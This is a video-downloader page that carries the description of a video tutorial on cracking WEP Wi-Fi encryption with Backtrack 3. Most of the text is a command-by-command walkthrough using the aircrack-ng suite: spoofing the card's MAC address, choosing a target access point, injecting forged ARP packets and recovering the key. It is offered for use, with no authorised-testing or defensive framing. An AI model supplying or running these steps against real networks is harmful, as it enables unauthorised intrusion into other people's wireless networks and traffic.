Copy the link of the video page and paste it here:
Example: http://www.youtube.com/watch?v=a7FQPMiph9M
NEW!. You can download videos from Vimeo!. :-)
Utils:
![]() |
WEP Crack with Backtrack 3 http://cf76b03d.any.gs - Link to backtrack This is a tutorial on how to crack a WEP code on a wireless access point. Here are the commands I use: airmon-ng stop wlan0 ifconfig wlan0 down macchanger -m 00:11:22:33:44:55 wlan0 airmon-ng start wlan0 airodump-ng wlan0 Pick your target, copy it's BSSID, press ctrl + C to end airodump. airodump-ng -c (channel) -w wep --bssid (paste AP's mac here) wlan0 Open a new KONSOLE: aireplay-ng -1 0 -a (paste AP) -h 00:11:22:33:44:55 wlan0 Smilieface = Success. :-) aireplay-ng -5 -b (paste AP) -h 00:11:22:33:44:55 wlan0 A packet will pop up, verify that the MAC is the same MAC of your target. Press Y if it is, N if it's not. packetforge-ng -0 -a (paste AP) - h 00:11:22:33:44:55 -k 255.255.255.255 -l 255.255.255.255 -y ( the .xor filename, starts with fragment..) -w ARP aireplay-ng -2 -r ARP wlan0 Press Y. Will start injecting, data packets will rise like crazy. When enough data is obtained.. aircrack-ng wep-01.cap -------------------------------------- If you have questions please ask in the comments! -------------------------------------- Card Compatability links: http://aircrack-ng.org/doku.php?id=compatibility_drivers#compatibility http://backtrack.offensive-security.com/index.php/Hardware_Compatibility Tags: Backtrack, Computer, Crack, WEP, aircrack, howto, linux, ng, slackware, tutorial, wifi 1 Downloads - Last from: (Your Blog here!) |